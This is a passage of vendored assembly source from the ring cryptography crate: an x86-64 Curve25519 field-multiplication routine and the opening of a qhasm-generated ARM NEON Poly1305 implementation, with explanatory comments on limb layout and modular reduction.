mulx r8, r9, rax
adcx r15, rcx
adox r9, r13
adcx r11, r9
adox rbx, r14
adox rdi, r12
adcx r8, rbx
adc rdi, 0x0
mulx r14, r13, rdi
test al, al
mov rdi, [ rsp - 0x48 ]
adox r13, r10
mov r14, r12
adox r14, r15
mov [ rdi + 0x8 ], r14
mov rax, r12
adox rax, r11
mov r10, r12
adox r10, r8
mov [ rdi + 0x10 ], rax
mov rcx, r12
cmovo rcx, rdx
adcx r13, rcx
mov [ rdi + 0x0 ], r13
mov [ rdi + 0x18 ], r10
mov rbx, [ rsp - 0x80 ]
.cfi_restore rbx
mov r12, [ rsp - 0x70 ]
.cfi_restore r12
mov r13, [ rsp - 0x68 ]
.cfi_restore r13
mov r14, [ rsp - 0x60 ]
.cfi_restore r14
mov r15, [ rsp - 0x58 ]
.cfi_restore r15
pop rbp
.cfi_restore rbp
.cfi_adjust_cfa_offset -8
ret
.cfi_endproc
#if defined(__ELF__)
.size fiat_curve25519_adx_square, .-fiat_curve25519_adx_square
#endif
#endif
|
mi2bjss/Pressel-site | 3,464 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/third_party/fiat/asm/fiat_curve25519_adx_mul.S | #include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86_64) && \
(defined(__APPLE__) || defined(__ELF__))
.intel_syntax noprefix
.text
#if defined(__APPLE__)
.private_extern _fiat_curve25519_adx_mul
.global _fiat_curve25519_adx_mul
_fiat_curve25519_adx_mul:
#else
.type fiat_curve25519_adx_mul, @function
.hidden fiat_curve25519_adx_mul
.global fiat_curve25519_adx_mul
fiat_curve25519_adx_mul:
#endif
.cfi_startproc
_CET_ENDBR
push rbp
.cfi_adjust_cfa_offset 8
.cfi_offset rbp, -16
mov rbp, rsp
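# fiat_curve25519_adx_mul(out, a, b): 4x4-limb schoolbook product of
# two GF(2^255-19) elements using MULX with dual ADCX/ADOX carry
# chains. The third argument is moved out of rdx first because MULX
# consumes rdx as an implicit operand. Reduction folds the high half
# back by 0x26 (38), exactly as in fiat_curve25519_adx_square above.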
mov rax, rdx
mov rdx, [ rsi + 0x18 ]
mulx r11, r10, [ rax + 0x8 ]
mov rdx, [ rax + 0x0 ]
mov [ rsp - 0x58 ], r15
.cfi_offset r15, -16-0x58
mulx r8, rcx, [ rsi + 0x18 ]
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x80 ], rbx
.cfi_offset rbx, -16-0x80
mulx rbx, r9, [ rax + 0x18 ]
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x70 ], r12
.cfi_offset r12, -16-0x70
mulx r15, r12, [ rax + 0x8 ]
mov rdx, [ rsi + 0x0 ]
mov [ rsp - 0x68 ], r13
.cfi_offset r13, -16-0x68
mov [ rsp - 0x60 ], r14
.cfi_offset r14, -16-0x60
mulx r14, r13, [ rax + 0x0 ]
mov rdx, [ rax + 0x10 ]
mov [ rsp - 0x18 ], r15
mov [ rsp - 0x50 ], rdi
mulx rdi, r15, [ rsi + 0x0 ]
mov rdx, [ rax + 0x18 ]
mov [ rsp - 0x48 ], r13
mov [ rsp - 0x40 ], r9
mulx r9, r13, [ rsi + 0x0 ]
test al, al
adox rcx, rdi
mov rdx, [ rsi + 0x10 ]
mov [ rsp - 0x38 ], r13
mulx r13, rdi, [ rax + 0x8 ]
adox r10, r9
mov rdx, 0x0
adox rbx, rdx
adcx rdi, rcx
adcx r8, r10
mov r9, rdx
adcx r9, rbx
mov rdx, [ rsi + 0x10 ]
mulx r10, rcx, [ rax + 0x0 ]
mov rdx, [ rsi + 0x0 ]
mov [ rsp - 0x30 ], r15
mulx r15, rbx, [ rax + 0x8 ]
mov rdx, -0x2
inc rdx
adox rcx, r15
setc r15b
clc
adcx rcx, r12
adox r10, rdi
mov rdx, [ rax + 0x10 ]
mov [ rsp - 0x78 ], rcx
mulx rcx, rdi, [ rsi + 0x10 ]
adox rdi, r8
mov rdx, [ rax + 0x18 ]
mov [ rsp - 0x28 ], rcx
mulx rcx, r8, [ rsi + 0x10 ]
mov rdx, [ rax + 0x10 ]
mov [ rsp - 0x20 ], r8
mulx r12, r8, [ rsi + 0x18 ]
adox r8, r9
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x10 ], r12
mulx r12, r9, [ rax + 0x10 ]
movzx rdx, r15b
lea rdx, [ rdx + rcx ]
adcx r9, r10
adcx r13, rdi
mov r15, 0x0
mov r10, r15
adox r10, rdx
mov rdx, [ rax + 0x18 ]
mulx rcx, rdi, [ rsi + 0x18 ]
adox rcx, r15
adcx r11, r8
mov rdx, r15
adcx rdx, r10
adcx rcx, r15
mov r8, rdx
mov rdx, [ rax + 0x0 ]
mulx r15, r10, [ rsi + 0x8 ]
test al, al
adox r10, r14
adcx rbx, r10
adox r15, [ rsp - 0x78 ]
adcx r15, [ rsp - 0x30 ]
adox r9, [ rsp - 0x18 ]
adcx r9, [ rsp - 0x38 ]
adox r13, [ rsp - 0x40 ]
adcx r12, r13
adox r11, [ rsp - 0x20 ]
adcx r11, [ rsp - 0x28 ]
mov rdx, 0x26
mulx rsi, r14, r12
adox rdi, r8
adcx rdi, [ rsp - 0x10 ]
mulx r10, r8, r11
mov r13, 0x0
adox rcx, r13
adcx rcx, r13
mulx r11, r12, rdi
xor rdi, rdi
adox r8, rbx
adox r12, r15
mulx rbx, r13, rcx
adcx r14, [ rsp - 0x48 ]
adox r13, r9
adox rbx, rdi
adcx rsi, r8
adcx r10, r12
adcx r11, r13
adc rbx, 0x0
mulx r9, r15, rbx
xor r9, r9
adox r15, r14
mov rdi, r9
adox rdi, rsi
mov rcx, r9
adox rcx, r10
mov r8, [ rsp - 0x50 ]
mov [ r8 + 0x8 ], rdi
mov r12, r9
adox r12, r11
mov r14, r9
cmovo r14, rdx
mov [ r8 + 0x18 ], r12
adcx r15, r14
mov [ r8 + 0x0 ], r15
mov [ r8 + 0x10 ], rcx
mov rbx, [ rsp - 0x80 ]
.cfi_restore rbx
mov r12, [ rsp - 0x70 ]
.cfi_restore r12
mov r13, [ rsp - 0x68 ]
.cfi_restore r13
mov r14, [ rsp - 0x60 ]
.cfi_restore r14
mov r15, [ rsp - 0x58 ]
.cfi_restore r15
pop rbp
.cfi_restore rbp
.cfi_adjust_cfa_offset -8
ret
.cfi_endproc
#if defined(__ELF__)
.size fiat_curve25519_adx_mul, .-fiat_curve25519_adx_mul
#endif
#endif
|
mi2bjss/Pressel-site | 62,534 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/crypto/poly1305/poly1305_arm_asm.S | #include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_ARM) && defined(__ELF__)
#pragma GCC diagnostic ignored "-Wlanguage-extension-token"
# This implementation was taken from the public-domain neon2 version
# in SUPERCOP by D. J. Bernstein and Peter Schwabe.
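# Layout note: Poly1305 values are kept in radix 2^26 (five 26-bit
# limbs per 130-bit value). The y*/z* arrays loaded below are
# precomputed key powers in that radix (presumably r^2 and r for the
# two-block stride), and 5y*/5z* are their 5x multiples, which let
# high-limb cross products reduce on the fly via
# 2^130 == 5 (mod 2^130 - 5).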
# qhasm: int32 input_0
# qhasm: int32 input_1
# qhasm: int32 input_2
# qhasm: int32 input_3
# qhasm: stack32 input_4
# qhasm: stack32 input_5
# qhasm: stack32 input_6
# qhasm: stack32 input_7
# qhasm: int32 caller_r4
# qhasm: int32 caller_r5
# qhasm: int32 caller_r6
# qhasm: int32 caller_r7
# qhasm: int32 caller_r8
# qhasm: int32 caller_r9
# qhasm: int32 caller_r10
# qhasm: int32 caller_r11
# qhasm: int32 caller_r12
# qhasm: int32 caller_r14
# qhasm: reg128 caller_q4
# qhasm: reg128 caller_q5
# qhasm: reg128 caller_q6
# qhasm: reg128 caller_q7
# qhasm: startcode
.fpu neon
.text
# qhasm: reg128 r0
# qhasm: reg128 r1
# qhasm: reg128 r2
# qhasm: reg128 r3
# qhasm: reg128 r4
# qhasm: reg128 x01
# qhasm: reg128 x23
# qhasm: reg128 x4
# qhasm: reg128 y0
# qhasm: reg128 y12
# qhasm: reg128 y34
# qhasm: reg128 5y12
# qhasm: reg128 5y34
# qhasm: stack128 y0_stack
# qhasm: stack128 y12_stack
# qhasm: stack128 y34_stack
# qhasm: stack128 5y12_stack
# qhasm: stack128 5y34_stack
# qhasm: reg128 z0
# qhasm: reg128 z12
# qhasm: reg128 z34
# qhasm: reg128 5z12
# qhasm: reg128 5z34
# qhasm: stack128 z0_stack
# qhasm: stack128 z12_stack
# qhasm: stack128 z34_stack
# qhasm: stack128 5z12_stack
# qhasm: stack128 5z34_stack
# qhasm: stack128 two24
# qhasm: int32 ptr
# qhasm: reg128 c01
# qhasm: reg128 c23
# qhasm: reg128 d01
# qhasm: reg128 d23
# qhasm: reg128 t0
# qhasm: reg128 t1
# qhasm: reg128 t2
# qhasm: reg128 t3
# qhasm: reg128 t4
# qhasm: reg128 mask
# qhasm: reg128 u0
# qhasm: reg128 u1
# qhasm: reg128 u2
# qhasm: reg128 u3
# qhasm: reg128 u4
# qhasm: reg128 v01
# qhasm: reg128 mid
# qhasm: reg128 v23
# qhasm: reg128 v4
# qhasm: int32 len
# qhasm: qpushenter crypto_onetimeauth_poly1305_neon2_blocks
.align 4
.global openssl_poly1305_neon2_blocks
.hidden openssl_poly1305_neon2_blocks
.type openssl_poly1305_neon2_blocks STT_FUNC
openssl_poly1305_neon2_blocks:
vpush {q4,q5,q6,q7}
mov r12,sp
sub sp,sp,#192
bic sp,sp,#31
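# 192 bytes of 32-byte-aligned scratch: eleven 16-byte slots for
# two24 and the spilled y/z key material (see the stack128 stores
# below). The caller's sp was saved in r12 for the epilogue.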
# qhasm: len = input_3
# asm 1: mov >len=int32#4,<input_3=int32#4
# asm 2: mov >len=r3,<input_3=r3
mov r3,r3
# qhasm: new y0
# qhasm: y0 = mem64[input_1]y0[1]; input_1 += 8
# asm 1: vld1.8 {<y0=reg128#1%bot},[<input_1=int32#2]!
# asm 2: vld1.8 {<y0=d0},[<input_1=r1]!
vld1.8 {d0},[r1]!
# qhasm: y12 = mem128[input_1]; input_1 += 16
# asm 1: vld1.8 {>y12=reg128#2%bot->y12=reg128#2%top},[<input_1=int32#2]!
# asm 2: vld1.8 {>y12=d2->y12=d3},[<input_1=r1]!
vld1.8 {d2-d3},[r1]!
# qhasm: y34 = mem128[input_1]; input_1 += 16
# asm 1: vld1.8 {>y34=reg128#3%bot->y34=reg128#3%top},[<input_1=int32#2]!
# asm 2: vld1.8 {>y34=d4->y34=d5},[<input_1=r1]!
vld1.8 {d4-d5},[r1]!
# qhasm: input_1 += 8
# asm 1: add >input_1=int32#2,<input_1=int32#2,#8
# asm 2: add >input_1=r1,<input_1=r1,#8
add r1,r1,#8
# qhasm: new z0
# qhasm: z0 = mem64[input_1]z0[1]; input_1 += 8
# asm 1: vld1.8 {<z0=reg128#4%bot},[<input_1=int32#2]!
# asm 2: vld1.8 {<z0=d6},[<input_1=r1]!
vld1.8 {d6},[r1]!
# qhasm: z12 = mem128[input_1]; input_1 += 16
# asm 1: vld1.8 {>z12=reg128#5%bot->z12=reg128#5%top},[<input_1=int32#2]!
# asm 2: vld1.8 {>z12=d8->z12=d9},[<input_1=r1]!
vld1.8 {d8-d9},[r1]!
# qhasm: z34 = mem128[input_1]; input_1 += 16
# asm 1: vld1.8 {>z34=reg128#6%bot->z34=reg128#6%top},[<input_1=int32#2]!
# asm 2: vld1.8 {>z34=d10->z34=d11},[<input_1=r1]!
vld1.8 {d10-d11},[r1]!
# qhasm: 2x mask = 0xffffffff
# asm 1: vmov.i64 >mask=reg128#7,#0xffffffff
# asm 2: vmov.i64 >mask=q6,#0xffffffff
vmov.i64 q6,#0xffffffff
# qhasm: 2x u4 = 0xff
# asm 1: vmov.i64 >u4=reg128#8,#0xff
# asm 2: vmov.i64 >u4=q7,#0xff
vmov.i64 q7,#0xff
# qhasm: x01 aligned= mem128[input_0];input_0+=16
# asm 1: vld1.8 {>x01=reg128#9%bot->x01=reg128#9%top},[<input_0=int32#1,: 128]!
# asm 2: vld1.8 {>x01=d16->x01=d17},[<input_0=r0,: 128]!
vld1.8 {d16-d17},[r0,: 128]!
# qhasm: x23 aligned= mem128[input_0];input_0+=16
# asm 1: vld1.8 {>x23=reg128#10%bot->x23=reg128#10%top},[<input_0=int32#1,: 128]!
# asm 2: vld1.8 {>x23=d18->x23=d19},[<input_0=r0,: 128]!
vld1.8 {d18-d19},[r0,: 128]!
# qhasm: x4 aligned= mem64[input_0]x4[1]
# asm 1: vld1.8 {<x4=reg128#11%bot},[<input_0=int32#1,: 64]
# asm 2: vld1.8 {<x4=d20},[<input_0=r0,: 64]
vld1.8 {d20},[r0,: 64]
# qhasm: input_0 -= 32
# asm 1: sub >input_0=int32#1,<input_0=int32#1,#32
# asm 2: sub >input_0=r0,<input_0=r0,#32
sub r0,r0,#32
# qhasm: 2x mask unsigned>>=6
# asm 1: vshr.u64 >mask=reg128#7,<mask=reg128#7,#6
# asm 2: vshr.u64 >mask=q6,<mask=q6,#6
vshr.u64 q6,q6,#6
# qhasm: 2x u4 unsigned>>= 7
# asm 1: vshr.u64 >u4=reg128#8,<u4=reg128#8,#7
# asm 2: vshr.u64 >u4=q7,<u4=q7,#7
vshr.u64 q7,q7,#7
# qhasm: 4x 5y12 = y12 << 2
# asm 1: vshl.i32 >5y12=reg128#12,<y12=reg128#2,#2
# asm 2: vshl.i32 >5y12=q11,<y12=q1,#2
vshl.i32 q11,q1,#2
# qhasm: 4x 5y34 = y34 << 2
# asm 1: vshl.i32 >5y34=reg128#13,<y34=reg128#3,#2
# asm 2: vshl.i32 >5y34=q12,<y34=q2,#2
vshl.i32 q12,q2,#2
# qhasm: 4x 5y12 += y12
# asm 1: vadd.i32 >5y12=reg128#12,<5y12=reg128#12,<y12=reg128#2
# asm 2: vadd.i32 >5y12=q11,<5y12=q11,<y12=q1
vadd.i32 q11,q11,q1
# qhasm: 4x 5y34 += y34
# asm 1: vadd.i32 >5y34=reg128#13,<5y34=reg128#13,<y34=reg128#3
# asm 2: vadd.i32 >5y34=q12,<5y34=q12,<y34=q2
vadd.i32 q12,q12,q2
# qhasm: 2x u4 <<= 24
# asm 1: vshl.i64 >u4=reg128#8,<u4=reg128#8,#24
# asm 2: vshl.i64 >u4=q7,<u4=q7,#24
vshl.i64 q7,q7,#24
# qhasm: 4x 5z12 = z12 << 2
# asm 1: vshl.i32 >5z12=reg128#14,<z12=reg128#5,#2
# asm 2: vshl.i32 >5z12=q13,<z12=q4,#2
vshl.i32 q13,q4,#2
# qhasm: 4x 5z34 = z34 << 2
# asm 1: vshl.i32 >5z34=reg128#15,<z34=reg128#6,#2
# asm 2: vshl.i32 >5z34=q14,<z34=q5,#2
vshl.i32 q14,q5,#2
# qhasm: 4x 5z12 += z12
# asm 1: vadd.i32 >5z12=reg128#14,<5z12=reg128#14,<z12=reg128#5
# asm 2: vadd.i32 >5z12=q13,<5z12=q13,<z12=q4
vadd.i32 q13,q13,q4
# qhasm: 4x 5z34 += z34
# asm 1: vadd.i32 >5z34=reg128#15,<5z34=reg128#15,<z34=reg128#6
# asm 2: vadd.i32 >5z34=q14,<5z34=q14,<z34=q5
vadd.i32 q14,q14,q5
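# 5y12/5y34/5z12/5z34 now hold 5*y and 5*z per 32-bit lane, computed
# as (v<<2)+v above; these are the reduction-folded key limbs used by
# the multiply loops.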
# qhasm: new two24
# qhasm: new y0_stack
# qhasm: new y12_stack
# qhasm: new y34_stack
# qhasm: new 5y12_stack
# qhasm: new 5y34_stack
# qhasm: new z0_stack
# qhasm: new z12_stack
# qhasm: new z34_stack
# qhasm: new 5z12_stack
# qhasm: new 5z34_stack
# qhasm: ptr = &two24
# asm 1: lea >ptr=int32#2,<two24=stack128#1
# asm 2: lea >ptr=r1,<two24=[sp,#0]
add r1,sp,#0
# qhasm: mem128[ptr] aligned= u4
# asm 1: vst1.8 {<u4=reg128#8%bot-<u4=reg128#8%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<u4=d14-<u4=d15},[<ptr=r1,: 128]
vst1.8 {d14-d15},[r1,: 128]
# qhasm: r4 = u4
# asm 1: vmov >r4=reg128#16,<u4=reg128#8
# asm 2: vmov >r4=q15,<u4=q7
vmov q15,q7
# qhasm: r0 = u4
# asm 1: vmov >r0=reg128#8,<u4=reg128#8
# asm 2: vmov >r0=q7,<u4=q7
vmov q7,q7
# qhasm: ptr = &y0_stack
# asm 1: lea >ptr=int32#2,<y0_stack=stack128#2
# asm 2: lea >ptr=r1,<y0_stack=[sp,#16]
add r1,sp,#16
# qhasm: mem128[ptr] aligned= y0
# asm 1: vst1.8 {<y0=reg128#1%bot-<y0=reg128#1%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<y0=d0-<y0=d1},[<ptr=r1,: 128]
vst1.8 {d0-d1},[r1,: 128]
# qhasm: ptr = &y12_stack
# asm 1: lea >ptr=int32#2,<y12_stack=stack128#3
# asm 2: lea >ptr=r1,<y12_stack=[sp,#32]
add r1,sp,#32
# qhasm: mem128[ptr] aligned= y12
# asm 1: vst1.8 {<y12=reg128#2%bot-<y12=reg128#2%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<y12=d2-<y12=d3},[<ptr=r1,: 128]
vst1.8 {d2-d3},[r1,: 128]
# qhasm: ptr = &y34_stack
# asm 1: lea >ptr=int32#2,<y34_stack=stack128#4
# asm 2: lea >ptr=r1,<y34_stack=[sp,#48]
add r1,sp,#48
# qhasm: mem128[ptr] aligned= y34
# asm 1: vst1.8 {<y34=reg128#3%bot-<y34=reg128#3%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<y34=d4-<y34=d5},[<ptr=r1,: 128]
vst1.8 {d4-d5},[r1,: 128]
# qhasm: ptr = &z0_stack
# asm 1: lea >ptr=int32#2,<z0_stack=stack128#7
# asm 2: lea >ptr=r1,<z0_stack=[sp,#96]
add r1,sp,#96
# qhasm: mem128[ptr] aligned= z0
# asm 1: vst1.8 {<z0=reg128#4%bot-<z0=reg128#4%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<z0=d6-<z0=d7},[<ptr=r1,: 128]
vst1.8 {d6-d7},[r1,: 128]
# qhasm: ptr = &z12_stack
# asm 1: lea >ptr=int32#2,<z12_stack=stack128#8
# asm 2: lea >ptr=r1,<z12_stack=[sp,#112]
add r1,sp,#112
# qhasm: mem128[ptr] aligned= z12
# asm 1: vst1.8 {<z12=reg128#5%bot-<z12=reg128#5%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<z12=d8-<z12=d9},[<ptr=r1,: 128]
vst1.8 {d8-d9},[r1,: 128]
# qhasm: ptr = &z34_stack
# asm 1: lea >ptr=int32#2,<z34_stack=stack128#9
# asm 2: lea >ptr=r1,<z34_stack=[sp,#128]
add r1,sp,#128
# qhasm: mem128[ptr] aligned= z34
# asm 1: vst1.8 {<z34=reg128#6%bot-<z34=reg128#6%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<z34=d10-<z34=d11},[<ptr=r1,: 128]
vst1.8 {d10-d11},[r1,: 128]
# qhasm: ptr = &5y12_stack
# asm 1: lea >ptr=int32#2,<5y12_stack=stack128#5
# asm 2: lea >ptr=r1,<5y12_stack=[sp,#64]
add r1,sp,#64
# qhasm: mem128[ptr] aligned= 5y12
# asm 1: vst1.8 {<5y12=reg128#12%bot-<5y12=reg128#12%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<5y12=d22-<5y12=d23},[<ptr=r1,: 128]
vst1.8 {d22-d23},[r1,: 128]
# qhasm: ptr = &5y34_stack
# asm 1: lea >ptr=int32#2,<5y34_stack=stack128#6
# asm 2: lea >ptr=r1,<5y34_stack=[sp,#80]
add r1,sp,#80
# qhasm: mem128[ptr] aligned= 5y34
# asm 1: vst1.8 {<5y34=reg128#13%bot-<5y34=reg128#13%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<5y34=d24-<5y34=d25},[<ptr=r1,: 128]
vst1.8 {d24-d25},[r1,: 128]
# qhasm: ptr = &5z12_stack
# asm 1: lea >ptr=int32#2,<5z12_stack=stack128#10
# asm 2: lea >ptr=r1,<5z12_stack=[sp,#144]
add r1,sp,#144
# qhasm: mem128[ptr] aligned= 5z12
# asm 1: vst1.8 {<5z12=reg128#14%bot-<5z12=reg128#14%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<5z12=d26-<5z12=d27},[<ptr=r1,: 128]
vst1.8 {d26-d27},[r1,: 128]
# qhasm: ptr = &5z34_stack
# asm 1: lea >ptr=int32#2,<5z34_stack=stack128#11
# asm 2: lea >ptr=r1,<5z34_stack=[sp,#160]
add r1,sp,#160
# qhasm: mem128[ptr] aligned= 5z34
# asm 1: vst1.8 {<5z34=reg128#15%bot-<5z34=reg128#15%top},[<ptr=int32#2,: 128]
# asm 2: vst1.8 {<5z34=d28-<5z34=d29},[<ptr=r1,: 128]
vst1.8 {d28-d29},[r1,: 128]
# qhasm: unsigned>? len - 64
# asm 1: cmp <len=int32#4,#64
# asm 2: cmp <len=r3,#64
cmp r3,#64
# qhasm: goto below64bytes if !unsigned>
bls ._below64bytes
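# Two-block main loop: each iteration consumes 64 bytes of input
# (four 16-byte blocks, two per 128-bit lane), multiplying the running
# state by the z powers and the freshly loaded blocks by the y powers.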
# qhasm: input_2 += 32
# asm 1: add >input_2=int32#2,<input_2=int32#3,#32
# asm 2: add >input_2=r1,<input_2=r2,#32
add r1,r2,#32
# qhasm: mainloop2:
._mainloop2:
# qhasm: c01 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>c01=reg128#1%bot->c01=reg128#1%top},[<input_2=int32#2]!
# asm 2: vld1.8 {>c01=d0->c01=d1},[<input_2=r1]!
vld1.8 {d0-d1},[r1]!
# qhasm: c23 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>c23=reg128#2%bot->c23=reg128#2%top},[<input_2=int32#2]!
# asm 2: vld1.8 {>c23=d2->c23=d3},[<input_2=r1]!
vld1.8 {d2-d3},[r1]!
# qhasm: r4[0,1] += x01[0] unsigned* z34[2]; r4[2,3] += x01[1] unsigned* z34[3]
# asm 1: vmlal.u32 <r4=reg128#16,<x01=reg128#9%bot,<z34=reg128#6%top
# asm 2: vmlal.u32 <r4=q15,<x01=d16,<z34=d11
vmlal.u32 q15,d16,d11
# qhasm: ptr = &z12_stack
# asm 1: lea >ptr=int32#3,<z12_stack=stack128#8
# asm 2: lea >ptr=r2,<z12_stack=[sp,#112]
add r2,sp,#112
# qhasm: z12 aligned= mem128[ptr]
# asm 1: vld1.8 {>z12=reg128#3%bot->z12=reg128#3%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>z12=d4->z12=d5},[<ptr=r2,: 128]
vld1.8 {d4-d5},[r2,: 128]
# qhasm: r4[0,1] += x01[2] unsigned* z34[0]; r4[2,3] += x01[3] unsigned* z34[1]
# asm 1: vmlal.u32 <r4=reg128#16,<x01=reg128#9%top,<z34=reg128#6%bot
# asm 2: vmlal.u32 <r4=q15,<x01=d17,<z34=d10
vmlal.u32 q15,d17,d10
# qhasm: ptr = &z0_stack
# asm 1: lea >ptr=int32#3,<z0_stack=stack128#7
# asm 2: lea >ptr=r2,<z0_stack=[sp,#96]
add r2,sp,#96
# qhasm: z0 aligned= mem128[ptr]
# asm 1: vld1.8 {>z0=reg128#4%bot->z0=reg128#4%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>z0=d6->z0=d7},[<ptr=r2,: 128]
vld1.8 {d6-d7},[r2,: 128]
# qhasm: r4[0,1] += x23[0] unsigned* z12[2]; r4[2,3] += x23[1] unsigned* z12[3]
# asm 1: vmlal.u32 <r4=reg128#16,<x23=reg128#10%bot,<z12=reg128#3%top
# asm 2: vmlal.u32 <r4=q15,<x23=d18,<z12=d5
vmlal.u32 q15,d18,d5
# qhasm: c01 c23 = c01[0]c01[1]c01[2]c23[2]c23[0]c23[1]c01[3]c23[3]
# asm 1: vtrn.32 <c01=reg128#1%top,<c23=reg128#2%top
# asm 2: vtrn.32 <c01=d1,<c23=d3
vtrn.32 d1,d3
# qhasm: r4[0,1] += x23[2] unsigned* z12[0]; r4[2,3] += x23[3] unsigned* z12[1]
# asm 1: vmlal.u32 <r4=reg128#16,<x23=reg128#10%top,<z12=reg128#3%bot
# asm 2: vmlal.u32 <r4=q15,<x23=d19,<z12=d4
vmlal.u32 q15,d19,d4
# qhasm: r4[0,1] += x4[0] unsigned* z0[0]; r4[2,3] += x4[1] unsigned* z0[1]
# asm 1: vmlal.u32 <r4=reg128#16,<x4=reg128#11%bot,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r4=q15,<x4=d20,<z0=d6
vmlal.u32 q15,d20,d6
# qhasm: r3[0,1] = c23[2]<<18; r3[2,3] = c23[3]<<18
# asm 1: vshll.u32 >r3=reg128#5,<c23=reg128#2%top,#18
# asm 2: vshll.u32 >r3=q4,<c23=d3,#18
vshll.u32 q4,d3,#18
# qhasm: c01 c23 = c01[0]c23[0]c01[2]c01[3]c01[1]c23[1]c23[2]c23[3]
# asm 1: vtrn.32 <c01=reg128#1%bot,<c23=reg128#2%bot
# asm 2: vtrn.32 <c01=d0,<c23=d2
vtrn.32 d0,d2
# qhasm: r3[0,1] += x01[0] unsigned* z34[0]; r3[2,3] += x01[1] unsigned* z34[1]
# asm 1: vmlal.u32 <r3=reg128#5,<x01=reg128#9%bot,<z34=reg128#6%bot
# asm 2: vmlal.u32 <r3=q4,<x01=d16,<z34=d10
vmlal.u32 q4,d16,d10
# qhasm: r3[0,1] += x01[2] unsigned* z12[2]; r3[2,3] += x01[3] unsigned* z12[3]
# asm 1: vmlal.u32 <r3=reg128#5,<x01=reg128#9%top,<z12=reg128#3%top
# asm 2: vmlal.u32 <r3=q4,<x01=d17,<z12=d5
vmlal.u32 q4,d17,d5
# qhasm: r0 = r0[1]c01[0]r0[2,3]
# asm 1: vext.32 <r0=reg128#8%bot,<r0=reg128#8%bot,<c01=reg128#1%bot,#1
# asm 2: vext.32 <r0=d14,<r0=d14,<c01=d0,#1
vext.32 d14,d14,d0,#1
# qhasm: r3[0,1] += x23[0] unsigned* z12[0]; r3[2,3] += x23[1] unsigned* z12[1]
# asm 1: vmlal.u32 <r3=reg128#5,<x23=reg128#10%bot,<z12=reg128#3%bot
# asm 2: vmlal.u32 <r3=q4,<x23=d18,<z12=d4
vmlal.u32 q4,d18,d4
# qhasm: input_2 -= 64
# asm 1: sub >input_2=int32#2,<input_2=int32#2,#64
# asm 2: sub >input_2=r1,<input_2=r1,#64
sub r1,r1,#64
# qhasm: r3[0,1] += x23[2] unsigned* z0[0]; r3[2,3] += x23[3] unsigned* z0[1]
# asm 1: vmlal.u32 <r3=reg128#5,<x23=reg128#10%top,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r3=q4,<x23=d19,<z0=d6
vmlal.u32 q4,d19,d6
# qhasm: ptr = &5z34_stack
# asm 1: lea >ptr=int32#3,<5z34_stack=stack128#11
# asm 2: lea >ptr=r2,<5z34_stack=[sp,#160]
add r2,sp,#160
# qhasm: 5z34 aligned= mem128[ptr]
# asm 1: vld1.8 {>5z34=reg128#6%bot->5z34=reg128#6%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>5z34=d10->5z34=d11},[<ptr=r2,: 128]
vld1.8 {d10-d11},[r2,: 128]
# qhasm: r3[0,1] += x4[0] unsigned* 5z34[2]; r3[2,3] += x4[1] unsigned* 5z34[3]
# asm 1: vmlal.u32 <r3=reg128#5,<x4=reg128#11%bot,<5z34=reg128#6%top
# asm 2: vmlal.u32 <r3=q4,<x4=d20,<5z34=d11
vmlal.u32 q4,d20,d11
# qhasm: r0 = r0[1]r0[0]r0[3]r0[2]
# asm 1: vrev64.i32 >r0=reg128#8,<r0=reg128#8
# asm 2: vrev64.i32 >r0=q7,<r0=q7
vrev64.i32 q7,q7
# qhasm: r2[0,1] = c01[2]<<12; r2[2,3] = c01[3]<<12
# asm 1: vshll.u32 >r2=reg128#14,<c01=reg128#1%top,#12
# asm 2: vshll.u32 >r2=q13,<c01=d1,#12
vshll.u32 q13,d1,#12
# qhasm: d01 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>d01=reg128#12%bot->d01=reg128#12%top},[<input_2=int32#2]!
# asm 2: vld1.8 {>d01=d22->d01=d23},[<input_2=r1]!
vld1.8 {d22-d23},[r1]!
# qhasm: r2[0,1] += x01[0] unsigned* z12[2]; r2[2,3] += x01[1] unsigned* z12[3]
# asm 1: vmlal.u32 <r2=reg128#14,<x01=reg128#9%bot,<z12=reg128#3%top
# asm 2: vmlal.u32 <r2=q13,<x01=d16,<z12=d5
vmlal.u32 q13,d16,d5
# qhasm: r2[0,1] += x01[2] unsigned* z12[0]; r2[2,3] += x01[3] unsigned* z12[1]
# asm 1: vmlal.u32 <r2=reg128#14,<x01=reg128#9%top,<z12=reg128#3%bot
# asm 2: vmlal.u32 <r2=q13,<x01=d17,<z12=d4
vmlal.u32 q13,d17,d4
# qhasm: r2[0,1] += x23[0] unsigned* z0[0]; r2[2,3] += x23[1] unsigned* z0[1]
# asm 1: vmlal.u32 <r2=reg128#14,<x23=reg128#10%bot,<z0=reg128#4%bot
# asm 2: vmlal.u32 <r2=q13,<x23=d18,<z0=d6
vmlal.u32 q13,d18,d6
# qhasm: r2[0,1] += x23[2] unsigned* 5z34[2]; r2[2,3] += x23[3] unsigned* 5z34[3]
# asm 1: vmlal.u32 <r2=reg128#14,<x23=reg128#10%top,<5z34=reg128#6%top
# asm 2: vmlal.u32 <r2=q13,<x23=d19,<5z34=d11
vmlal.u32 q13,d19,d11
